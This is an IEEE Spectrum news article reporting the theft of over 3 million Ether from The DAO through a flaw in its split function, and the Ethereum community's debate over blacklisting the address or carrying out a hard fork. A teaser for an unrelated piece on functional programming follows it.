The December 2022 issue of IEEE Spectrum is here!

Close bar

DAO May Be Dead After $60 Million Theft

A serious blow to those who believe the blockchain is the future of commerce

3 min read
Illustration by Getty Images
Illustration: Getty Images

In the world of cryptocurrency, seven-figure heists are a rite of passage. And today, Ethereum, a much-hyped blockchain currency and autonomous software platform, has come of age. This morning, participants in a lavishly-funded investment vehicle called The DAO woke up to an onslaught of alarm bells when it was discovered that a hacker had utilized a vulnerability in the code to drain the fund. 

At 4 a.m., Griff Green, a developer for Slock.it, a company based in Germany that is building on the Ethereum blockchain and created The DAO, sent out this alert on the community’s Slack channel:

The DAO is being attacked. It has been going on for 3-4 hours, it is draining ETH at a rapid rate. This is not a drill.”

By midday, the attacker had stolen over 3 million Ether (Ethereum’s native currency), which at the time was worth more than 60 million U.S. dollars.

The DAO is a public investment fund that exists as a bundle of software on the Ethereum network. In a sale this spring, participants signed up for the fund by using their Ether to buy DAO tokens. This, in turn, gave them proportional ownership as well as the right to vote on investment proposals. The DAO software was intended to autonomously coordinate and enforce voting and fund allocation, thereby creating an investment vehicle that could operate without third-parties. The sale was much more successful than anyone expected, and by the end of May, Ether holders had dumped more than $150 million worth of their cryotocurrency into The DAO.

A day before the fund opened for business, a group of researchers identified critical flaws and biases in the process whereby participants vote on spending proposals. There was an appeal for a moratorium until fixes could be made, but today’s losses were caused by a bug that had gone unnoticed until now.

The DAO software gives token holders the ability to take their contributions and split from the larger group into their own identical DAOs. Once the split occurs, the person who created the new DAO has full control over what happens to the tokens, and after 27 days he or she is free to sell the tokens on an exchange to recoup the investment. People who choose this route should be able to leave with only as many tokens as they rightfully own. But late last night, someone found a way to split off with more than their fair share. According to sources, the hacker who did this now controls a satellite DAO that contains 100 times the amount of tokens that he initially invested.

Already, Ethereum developers are proposing ways to fix the situation. The easiest, and least controversial solution is for the network to adopt a new version of the Ethereum software that blacklists the address holding the hacker’s stolen funds, making it impossible for him to cash out on the heist.

But this would do nothing to recoup the losses sustained by The DAO. In order to return the funds back to their rightful owners, the Ethereum community would have to agree to a radical maneuver called a “hard fork” which would essentially roll back Ethereum’s historical record of transactions to a point in time before the heist occurred. This option will inevitably inspire heated debate as it calls into question the immutability of the Ethereum blockchain, which is one of the defining characteristics of the technology.

There is no telling yet whether The DAO will survive this hack. But the theft has undeniably harmed the reputation of decentralized financial instruments and the Ethereum project in general. Since Ethereum went live in the spring of 2015, developers have rushed to build autonomously functioning services on the platform. It is now becoming apparent that properly implementing these applications requires expertise in both coding and game theory.

When contracts are not properly vetted, we now know that it is not only the people using that particular application that suffer. The plaform as a whole also takes a hit. In the hours following the heist, the price of Ether has dropped by over 30 percent on online exchanges. 

The Conversation (0)

Why Functional Programming Should Be the Future of Software Development

It’s hard to learn, but your code will produce fewer nasty surprises

11 min read
Vertical
A plate of spaghetti made from code
Shira Inbar
DarkBlue1

You’d expectthe longest and most costly phase in the lifecycle of a software product to be the initial development of the system, when all those great features are first imagined and then created. In fact, the hardest part comes later, during the maintenance phase. That’s when programmers pay the price for the shortcuts they took during development.

So why did they take shortcuts? Maybe they didn’t realize that they were cutting any corners. Only when their code was deployed and exercised by a lot of users did its hidden flaws come to light. And maybe the developers were rushed. Time-to-market pressures would almost guarantee that their software will contain more bugs than it would otherwise.

Keep Reading ↓Show less
{"imageShortcodeIds":["31996907"]}